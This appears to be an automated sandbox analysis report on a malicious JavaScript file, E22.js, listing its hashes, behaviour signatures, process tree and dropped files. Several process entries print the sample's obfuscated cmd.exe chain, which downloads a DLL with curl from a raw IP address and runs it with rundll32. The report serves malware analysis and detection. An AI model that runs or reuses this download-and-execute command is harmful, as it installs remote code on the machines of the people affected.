Analysis

  • max time kernel
    143s
  • max time network
    270s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/10/2023, 11:09

General

  • Target

    E22.js

  • Size

    411KB

  • MD5

    babe6c10e982d330159da694fb24bb9c

  • SHA1

    af4ac715139eb6c02457cdecdb3763c3a491ff26

  • SHA256

    911db6f7254a6583284b930ef7fea36462971da3f250085b6769b8bb65ef1af4

  • SHA512

    cbfedcdbbe4906151189751a819c4e32e06cce98e5962a4e0c3851aa5981b48229650db5045795c5df64a0e1e70907ae43f4bef1e6c749db07bacb34b3ac14cf

  • SSDEEP

    6144:Gj38P9IwPaHP79bvi5u9r9pMrSGyhZCod1fnbyC36dxEDukY4X1:MNXCgt6dxEfY4F

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\E22.js
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c zZE || Echo zZE & ping zZE || Curl http://66.42.96.41/QIz/envir -o %TmP%\zZE.dll & ping -n 4 zZE || RUNDLl32 %tMP%\zZE.dll, Crash & eXit U=Np=GVCQH
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4884
      • C:\Windows\system32\PING.EXE
        ping zZE
        3⤵
        • Runs ping.exe
        PID:1228
      • C:\Windows\system32\curl.exe
        Curl http://66.42.96.41/QIz/envir -o C:\Users\Admin\AppData\Local\Temp\zZE.dll
        3⤵
          PID:1312
        • C:\Windows\system32\PING.EXE
          ping -n 4 zZE
          3⤵
          • Runs ping.exe
          PID:1344
        • C:\Windows\system32\rundll32.exe
          RUNDLl32 C:\Users\Admin\AppData\Local\Temp\zZE.dll, Crash
          3⤵
            PID:3268
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:4572
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E22.js"
          1⤵
          • Checks computer location settings
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1180
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c zZE || Echo zZE & ping zZE || Curl http://66.42.96.41/QIz/envir -o %TmP%\zZE.dll & ping -n 4 zZE || RUNDLl32 %tMP%\zZE.dll, Crash & eXit U=Np=GVCQH
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3492
            • C:\Windows\system32\PING.EXE
              ping zZE
              3⤵
              • Runs ping.exe
              PID:4400
            • C:\Windows\system32\curl.exe
              Curl http://66.42.96.41/QIz/envir -o C:\Users\Admin\AppData\Local\Temp\zZE.dll
              3⤵
                PID:3468
              • C:\Windows\system32\PING.EXE
                ping -n 4 zZE
                3⤵
                • Runs ping.exe
                PID:3236
              • C:\Windows\system32\rundll32.exe
                RUNDLl32 C:\Users\Admin\AppData\Local\Temp\zZE.dll, Crash
                3⤵
                  PID:4828
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\E22.js"
              1⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:1228
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c zZE || Echo zZE & ping zZE || Curl http://66.42.96.41/QIz/envir -o %TmP%\zZE.dll & ping -n 4 zZE || RUNDLl32 %tMP%\zZE.dll, Crash & eXit U=Np=GVCQH
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1332
                • C:\Windows\system32\PING.EXE
                  ping zZE
                  3⤵
                  • Runs ping.exe
                  PID:3412
                • C:\Windows\system32\curl.exe
                  Curl http://66.42.96.41/QIz/envir -o C:\Users\Admin\AppData\Local\Temp\zZE.dll
                  3⤵
                    PID:5076
                  • C:\Windows\system32\PING.EXE
                    ping -n 4 zZE
                    3⤵
                    • Runs ping.exe
                    PID:1344
                  • C:\Windows\system32\rundll32.exe
                    RUNDLl32 C:\Users\Admin\AppData\Local\Temp\zZE.dll, Crash
                    3⤵
                      PID:4544
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4428
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    2⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:1976
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.0.1175651132\1796674403" -parentBuildID 20221007134813 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {632c06ef-b627-4fbe-8240-7f24ace9f91c} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 2008 196285d8858 gpu
                      3⤵
                        PID:5000
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.1.238594389\2012512450" -parentBuildID 20221007134813 -prefsHandle 2396 -prefMapHandle 2384 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da097505-ec29-4982-bd4a-414c26fb6358} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 2408 196284fd258 socket
                        3⤵
                        • Checks processor information in registry
                        PID:3288
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.2.568499092\1003123386" -childID 1 -isForBrowser -prefsHandle 3032 -prefMapHandle 3064 -prefsLen 21012 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6690f0b-cba1-4148-9f3e-9774eb344240} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 3236 1962c5a9b58 tab
                        3⤵
                          PID:4984
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.3.663372310\628329067" -childID 2 -isForBrowser -prefsHandle 3548 -prefMapHandle 3544 -prefsLen 26437 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {66f59275-e872-4008-837c-3117dd5514eb} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 3560 1961bd62b58 tab
                          3⤵
                            PID:4872
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.4.356710623\1657853670" -childID 3 -isForBrowser -prefsHandle 4388 -prefMapHandle 4380 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {735d714b-6345-4d8a-a6ff-215958880d17} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 4412 1962dc1f958 tab
                            3⤵
                              PID:3128
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.7.2112647706\1995912104" -childID 6 -isForBrowser -prefsHandle 5336 -prefMapHandle 5340 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ada6dae-43dd-4697-9d03-25037def518a} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 5328 1962e97e658 tab
                              3⤵
                                PID:3928
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.6.1128437581\1987801923" -childID 5 -isForBrowser -prefsHandle 5148 -prefMapHandle 5152 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a027fbcf-8382-4b20-a8c4-83568845b436} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 5140 1962e97d158 tab
                                3⤵
                                  PID:3616
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.5.628534519\626101156" -childID 4 -isForBrowser -prefsHandle 4992 -prefMapHandle 4988 -prefsLen 26496 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {370a0a65-63f1-488f-93da-5cd09ec113ea} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 5004 19629da5c58 tab
                                  3⤵
                                    PID:2080
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1976.8.1908982746\1590523182" -childID 7 -isForBrowser -prefsHandle 4864 -prefMapHandle 6020 -prefsLen 27096 -prefMapSize 232675 -jsInitHandle 1228 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3831b46-ff4e-4626-8f4c-08f7b8507d5a} 1976 "\\.\pipe\gecko-crash-server-pipe.1976" 4872 1962c559b58 tab
                                    3⤵
                                      PID:5764
                                • C:\Windows\system32\cmd.exe
                                  "C:\Windows\system32\cmd.exe"
                                  1⤵
                                    PID:2484
                                    • C:\Windows\system32\curl.exe
                                      curl http://66.42.96.41/QIz/envir
                                      2⤵
                                        PID:4276
                                      • C:\Windows\system32\curl.exe
                                        curl http://66.42.96.41/QIz/envir -v
                                        2⤵
                                          PID:3740
                                        • C:\Windows\system32\curl.exe
                                          curl http://66.42.96.41/QIz/envir -v
                                          2⤵
                                            PID:1352
                                          • C:\Windows\system32\curl.exe
                                            curl http://66.42.96.41/QIz/envir -v
                                            2⤵
                                              PID:4228
                                            • C:\Windows\system32\curl.exe
                                              curl http://66.42.96.41/QIz/envir -v
                                              2⤵
                                                PID:3264

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C42BC945025A34066DAB76EF3F80A05

                                              Filesize

                                              41KB

                                              MD5

                                              a6624f60c945c19a480aaae6ccc93fc0

                                              SHA1

                                              ac4d8c009402bd8009e56e8e6885ad80e525e58c

                                              SHA256

                                              7ff7ae6ea4c73021b14102f0ae70413d1460bf6a279c63db38c9f69d7d08c656

                                              SHA512

                                              4f576f6dbffc6f76928e16c6993818d81d5fda243144f369a795f605ef07c773fbd56a0cd4b32a8e8101b3c125d31d125a8272457894d4273a22b87948675f34

                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

                                              Filesize

                                              727B

                                              MD5

                                              4e25d0434bd1f6cf35ee2c332255e571

                                              SHA1

                                              95a58811cbde3a2513d7fb8210e79545d45b8ab4

                                              SHA256

                                              8bc805fff18eda3d49a908d49f5659c07231e5bf0f4508019624b38a385a90f9

                                              SHA512

                                              09ef92c3f49ea82800bcd0b4fdcb6d7a5e559c9dad9bbdda139cbabef08907b89234026ece34f47e5626d5f56103220ac907ceda3c63b7eaab8933acbcf02e23

                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C42BC945025A34066DAB76EF3F80A05

                                              Filesize

                                              314B

                                              MD5

                                              45da28f1c09f2c07c6dd0aac6a618c4e

                                              SHA1

                                              b3c0ab84ca78947ab940e164f6e9dc2ef145226c

                                              SHA256

                                              8645faea6ceadfa92af3325345aa0d752c0aa6022c9c9bf10d5679259fd49f93

                                              SHA512

                                              176a2973a3bb60ea941f4003152872f2b75fe9c1c900b27a62234be0de49ce3cb7d612359558b73c3b75e10bde71eefbbdacda80b1e4e5193feb3779e3433212

                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FE17BEC2A573BC9AE36869D0274FFA19_6DA81F04C5F9EAD2CD0268808FCE61E1

                                              Filesize

                                              478B

                                              MD5

                                              515be242a4fd9dbd0e353e35b32f4b30

                                              SHA1

                                              dc40d4c8450a1bae92baba9c7e7efb9b0a88f055

                                              SHA256

                                              4b33ccc71e91b85e69ee1fcf245fa53d97e9fa9acfb9cd1ca639cc8b0ac8cf13

                                              SHA512

                                              d1252f9fd92db56fca1ddb5a59fa8b134d48fcdbf448c89d1f0df33e52c37e96b85d61098fed690ecedcc2b597754729f33d112d94db01e75ee96347faa9f101

                                            • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\u8s93mxk.default-release\activity-stream.discovery_stream.json.tmp

                                              Filesize

                                              23KB

                                              MD5

                                              b1ed7b8dcaab32a2cd0940513e7e8660

                                              SHA1

                                              aa0b27c57e5e6b2f036915d5417383a8413121ab

                                              SHA256

                                              245641c235f3429d2f53b64beb881663b8de26c9f9366a2614370ec6d818d516

                                              SHA512

                                              de048afe80e4e33c193b24e0241f27ae22343583b901c36225be24228c1bc11d6e0288b251c134bb0e68d059dcfd073dd6a9cab90bd65272886b143fccf86c06

                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\prefs-1.js

                                              Filesize

                                              6KB

                                              MD5

                                              ab46d57d021ccb6f01fe717017cd9c08

                                              SHA1

                                              ffe32332117312c3fab9b9e2a3fa0aba0802bb64

                                              SHA256

                                              0c8108dd0153d37eb117f44c6a3d4a21e75f437bf90fa062b974f1bd18aab4f3

                                              SHA512

                                              b7b54ac19e0a00b1b0365743e3a5144ef3694f34856e0142e421e89abea39012aa618983ac0663ac8131ef5835da02f1735cf76a68bc1b8a39a2ddd6fb0b8798

                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\prefs-1.js

                                              Filesize

                                              6KB

                                              MD5

                                              cdd1ee26e92eb7696adc7610a9faaeea

                                              SHA1

                                              9e800eed388ee862da7eabefce63e84f632f62bf

                                              SHA256

                                              bfe32cb77c9bd8be307bae2385f020ad698f353a3aeb4b92c5eb7951aac84973

                                              SHA512

                                              cbb50540f6a8f47661e203d6019e3c1f5d797c329f0a2687c8dce0f0327993e4f01a9542be9452cba3058bea1b82b661ae7ecb4f2b9d2127a4e033c72b041975

                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\prefs.js

                                              Filesize

                                              6KB

                                              MD5

                                              f0686a8e5e42372ce1390379bad43492

                                              SHA1

                                              5d40654981e98f57007d42096e2d57a360e0b66c

                                              SHA256

                                              fc319aa41b53e1c1bd99dcd625203387cc1d6e65bdda74befd4d3a1f52ffa82d

                                              SHA512

                                              6cd4278a822c633f4875439c3cff70dc7af5a9800b433c28164a50c87ca0e7850e661427b447564b0984233a1b0b7fcd9be57b93fd193d51c01b211f6cd24aa8

                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\sessionstore-backups\recovery.jsonlz4

                                              Filesize

                                              1KB

                                              MD5

                                              8006b87c2b32dedf1dc09ad6b3236d99

                                              SHA1

                                              43006832297bdfec86be61e35a1b75baa9cfdb34

                                              SHA256

                                              a030429b297107e110f6cb79ae7f46cdc2fe4a1f262a32ca2321d3a97187a5a5

                                              SHA512

                                              1be4ae2cdded94d22f86be8257e8e72032c5dcae1632d00a1a60f2410ee3521d6745016a90a2302517a74032044df2e7f090e3b9c6a1c57453be03ecbd96113f

                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\sessionstore-backups\recovery.jsonlz4

                                              Filesize

                                              1KB

                                              MD5

                                              8cbfbd0892f7fead0a9729fb7324eb0c

                                              SHA1

                                              0315656fddacfbc2b35213a152c2bd84191ea0e7

                                              SHA256

                                              ee208b9e06a6470db0d87aea64ea80daefa2158c3ea42175289416caa6daec16

                                              SHA512

                                              a8a94abe0923b5bc968843ade93c7f8481926aca7b80a86a223e2c30221bcf3f9abf354c5dfa65084e42c0b34df864d4e26d8a0a4756a8da72eb393f850ee783

                                            • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\u8s93mxk.default-release\sessionstore.jsonlz4

                                              Filesize

                                              880B

                                              MD5

                                              e3939027617ed78d33aba15879fd369a

                                              SHA1

                                              8f0d7a36ac8651fd90bc92868f39459305cdce30

                                              SHA256

                                              e3879589601c784105f50332c01c73c280f85192c564400c85b30905abc8a3b3

                                              SHA512

                                              9cfcf36897f3f4e170417e8163714b6d4ff8a10e1f6baa6b847f549c9cdedcbc74e8c02b1e05ef29336b830415cf9048b3470a84795d3d7e95d2daee41853ec2